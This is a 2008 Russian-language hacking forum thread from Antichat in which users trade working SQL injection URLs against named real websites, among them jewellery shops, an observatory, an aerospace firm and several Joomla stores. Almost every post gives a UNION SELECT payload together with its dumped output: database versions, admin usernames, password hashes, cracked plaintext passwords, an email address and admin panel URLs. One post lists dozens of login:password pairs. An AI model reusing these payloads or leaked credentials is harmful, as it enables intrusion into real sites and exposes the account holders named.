ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #6901  
Старый 21.11.2008, 02:42
Аватар для ThreeD
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию

Заканчиваю тему ювелирок:
__________________

http://affiliate.findjewellery.co.uk/news-article.php?id=-12+union+select+1,2,version(),4,5,6,7,8/*

4.1.22-standard

__________________

http://www.mardojewellery.com.au/product_list.php?ID=28+union+select+1,version(),3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+ad min/*

4.1.22-standard-log
__________________

http://www.kestanejewellery.com/page.php?id=-426'+union+select+1,concat_ws(0x3A3a,id,type,user, password),3,4,5+from+users/*

5.0.45-log

19::admin ::karen:: opera
__________________

http://www.weddingsinwinnipeg.ca/jewellery.php?id=-107+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x 3A3a,password),12+from+administrators/*

4.1.20

9dfc5c7e39fc03ffb9698d37984d68a2::billion

__________________

http://www.georgejewellery.com/article.php?id=-28+union+select+version()/*

4.1.19-log

Последний раз редактировалось ThreeD; 21.11.2008 в 03:14..
 
Ответить с цитированием

  #6902  
Старый 21.11.2008, 10:01
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

http://www.keckobservatory.org/article.php?id=-231+union+select+1,2, 3,4,5,6,7,8,9,10,11/*

Database Version: 4.1.22
Database name: keck
User name: keck@localhost

Вроде не было если было извиняйте...
 
Ответить с цитированием

  #6903  
Старый 21.11.2008, 14:42
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

http://vectoraerospace.ca/news.php?id=77+union+select+1,2,3,4,5,6,7,8,9/*
Выводимые {3},4,6,7,8,9

Database Version: 5.0.45
Database name: vector_db
User name: web@localhost

table admin_users
+user_id
+login_name
+password
+name
+level

vector:28e66ff14ddae884ee643708b8fe40be: Administrator pass: 105Bedford
dave mcgrath:57b1bd2bafca5a7ce9793b4b1f83b7b7:Administr ator: pass: raider
phil.self:e2f33497edb409cb56f1a629a45885a8:Adminis trator: pass: SIGMA1
evelyn.hensman:c1d96395bdac759e16b98789581c70d7:Ad ministrator pass: poprocks


Админка: http://vectoraerospace.ca/admin/

Последний раз редактировалось spherics; 21.11.2008 в 14:47..
 
Ответить с цитированием

  #6904  
Старый 21.11.2008, 16:13
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

http://maadesign.co.uk/newsdetails.php?id=9+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14/*

version:4.1.22-standard
user:maa2_wwsol@localhost
database:maa2_wwsolution
 
Ответить с цитированием

  #6905  
Старый 21.11.2008, 16:47
Аватар для Hero1n
Hero1n
Новичок
Регистрация: 11.11.2008
Сообщений: 18
Провел на форуме:
295080

Репутация: 17
По умолчанию

Цитата:
http://www.windows-conservatories.co.uk/index1.php?id=-12+union+select+1,2,concat(LoginName,char(58),Pass word),4,5,6,7,8,9,10,11,12,13,14,15+from+Users/*
nova:race26
drrobinson:window
rep:novagroup
ftplimited:evesham
castlebridge:egremont
edenvalleyenrith
seniorswindows:kippax
leekglass:compton
cheadleglass:stockport
northernglass:rivulet
bebington:wirral
conservatoriesower
kingdomwindows:glenrothes
idealwindows:hinge
ricks:focus
kirkton:Carluke
reps:belvedere
southcheshire:crewe
britwood:britwood
congleton:georgia
mmjoinery:butterber
RGowing:vale
centralglass:windowcill99
Paul:novagroup
studleycons:shawbank
DDCL:zouch
WardGlass:FREEL
perennial:marple
meirglass:sandon
econnor:joinery
johnroberts:Forwyn
chambers:workington
humberside:trafford
gpearce:weir
patelever:hazel
tjones:cibyn
wearingbuild:wirral
washington:derby
dgms:york
meadowview:bronhaul
orionwindows:audax
davehopton:braemar
csglaziers :Buckley
taplastics:ctudhoe
 
Ответить с цитированием

  #6906  
Старый 22.11.2008, 00:21
Аватар для -m0rgan-
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

скуди в joomla:
Код:
http://www.feellove.eu/exptemp/index.php?option=com_expshop&page=show_payment&catid=-2+UNION+SELECT+1,2,concat(username,0x3a,password)+FROM+jos_users--
логин/пасс:
Код:
admin:eb9d2dcd0b8beb9c3ae60f21d0e78578
---------------------------------
Код:
http://www.gamenuke.org/index.php?option=com_expshop&page=show_payment&catid=-2+UNION+SELECT+1,1,concat(username,0x3a,password)+FROM+jos_users--
логин/пасс:
Код:
Atomm:c404d8ecb25650f4c75911e4cca03563:jw9dEIiUcxCZIgQy
-----------------------------------
Код:
http://phhboxing.org/index.php?option=com_expshop&page=show_payment&catid=-2+UNION%20SELECT+1,2,concat(username,0x3a,password)+FROM+jos_users--
логин/пасс:
Код:
ninjiharris:dbafe7bfe987485c997fc65ccf2530bf:sDYp0Go5mwiG0df6
---------------------------------
Код:
http://www.toybrickid.com/index.php?option=com_expshop&page=show_payment&catid=-2+UNION+SELECT+1,2,concat(username,0x3a,password)+FROM+jos_users--
логин/пасс:
Код:
admin:d6358b73f5c624301eea3a9ba9bfbd1b:BoDk5m5hVytohLhE
---------------------------------------
Код:
http://www.freewebstemplate.net/index.php?option=com_expshop&page=show_payment&catid=-2+UNION+SELECT+1,2,concat(username,0x3a,password)+FROM+jos_users--
логин/пасс:
Код:
admin:e64bdb8d05f73f025c859eede39007fe:oVZJ0FrZdvqfJyHo
---------------------------------------
php nuke:
Код:
http://www.ediliziaesistemi.com/modules.php?name=BookCatalog&op=category&catid=1-null+union+select+1,aid+from+nuke_authors--
Код:
http://www.ediliziaesistemi.com/modules.php?name=BookCatalog&op=category&catid=1-null+union+select+1,pwd+from+nuke_authors--
логин/пасс:
Код:
Elisabetta:e27cc622d1e87601a77f55087a40bf3f
расшифровка:
Код:
Elisabetta:613939
----------------------------------------------
The End!
 
Ответить с цитированием

  #6907  
Старый 22.11.2008, 00:56
Аватар для -m0rgan-
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Код:
http://www.je.is/index.php?option=com_ahsshop&do=default&vara=-99999/**/union/**/select/**/0,concat(username,0x3a,password),0x3a,3,4,0x3a,6,0x3a/**/from/**/mos_users/*&Itemid=0&sP=0
логин,пасс:
Код:
admin:0b3574ee3dc278785e266fe300688ab5
--------------------------------------
Код:
http://www.redinet.am/index.php?lng=-1+union+select+1,2,3,concat_ws(0x3a,name,pass),5,6,7,8,9,10,11+from+users+limit+0,1/*
логин,пасс:
Код:
editor:158de3c5219fa1bb
---------------------------------------
Код:
http://www.trainingteam.net/index.php?option=com_rekry&Itemid=60&rekryview=add&op_id=-1/**/union/**/select/**/1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20jos_users%20limit%201,1--
логин,пасс:
Код:
balihotchili:2be600495ab19e130b6ec56969156a56:8KkLPuai8wSUH19W
-------------------------------------
Код:
http://www.microhydropower.net/news/viewnews.php?ID=-1+UNION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7+FROM+users--
логин,пасс:
Код:
kubu:freedom
--------------------------------------
Код:
http://www.berceaumagique.com/cat.php?id=-6+union+select+1,2,3,concat_ws(0x3a,login,0x3a,pass,0x3a,mail),5,6,7,8,9+from+admin+where+id=1--
логин,пасс,мыло:
Код:
charlotte:::407686174a65f5219d4b2132df7d29fa:::c.gaillard@berceaumagique.com
-----------------------------------------
Код:
http://www.ghanadate.co.uk/b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10/**/from/**/members/*
логин,пасс:
Код:
mofad:25eabb60d24d19239d075a7917c207a5
-----------------------------------------
Код:
http://www.mtvphil.com/news.php?id=-17+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11+from+members+limit+0,1--
логин,пасс:
Код:
lenard:f1d8c6941e9b92bdc6d60615b069e882
---------------------------------------
Код:
http://www.almemo.org.al/rub.php?l=a&idr=12+and+1=2+union+all+select+1,2,3,concat(username,char(58),password),5,6,7,8+from+editor--
логин,пасс:
Код:
admin:fe01ce2a7fbac8fafaed7c982a04e229
---------------------------------------
The End!
 
Ответить с цитированием

  #6908  
Старый 22.11.2008, 00:57
Аватар для Ponchik
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию

Хакнем презики
contex-condom.ru
На уровне пакета
Код:
GET http://www.contex-condom.ru/link.php?lnk_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,VERSION(),10,11-- HTTP/1.0
Host: www.contex-condom.ru
ответ
Код:
HTTP/1.1 302 Found
Date=Fri, 21 Nov 2008 20:56:49 GMT
Content-Type=text/html; charset=windows-1251
Transfer-Encoding=chunked
Connection=keep-alive
Keep-Alive=timeout=5
Server=Apache
Cache-Control=max-age=0
Expires=Fri, 21 Nov 2008 20:56:49 GMT
Location=5.0.67-log
таблы (учтите, они в разных БД, в этой с префиксом xru_)
Код:
chat_entries
chat_users
md_adm
md_adm2type
md_bbs
md_bbs_type
md_cnf
md_fil
md_img
md_lnk
md_tab
md_txt
md_type
md_usr
xru_adm
xru_adm2type
xru_banner_stats
xru_cnf
xru_downloads
xru_fil
xru_img
xru_lnk
xru_tab
xru_txt
xru_type

Последний раз редактировалось Ponchik; 22.11.2008 в 02:04..
 
Ответить с цитированием

Еще шоп
  #6909  
Старый 22.11.2008, 01:07
Аватар для FNS
FNS
Новичок
Регистрация: 07.11.2008
Сообщений: 17
Провел на форуме:
51589

Репутация: 55
Отправить сообщение для FNS с помощью ICQ
По умолчанию Еще шоп

Код:
http://www.marclothing.com/news.php?ax=v&n=9&id=9&nid=-58+union+select+1,version(),3,4,5--
Цитата:
4.1.22-standard-log
 
Ответить с цитированием

Еще шоп
  #6910  
Старый 22.11.2008, 03:16
Аватар для FNS
FNS
Новичок
Регистрация: 07.11.2008
Сообщений: 17
Провел на форуме:
51589

Репутация: 55
Отправить сообщение для FNS с помощью ICQ
По умолчанию Еще шоп

Код:
http://www.gocontempo.com/pages.php?id=-2/**/union/**/select/**/1,2,3,table_name,5,6,7,8,9,10,11,12,13,14+from+`information_schema`.tables--
Код:
http://www.gocontempo.com/pages.php?id=-2/**/union/**/select/**/1,2,3,group_concat(UserName,0x3a,UserPwd),5,6,7,8,9,10,11,12,13,14+from+tblusers--
Цитата:
http://www.gocontempo.com/admin/
Цитата:
adm1n:webm1n,contempo:alex1983,gocontempo:furnitur e1
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ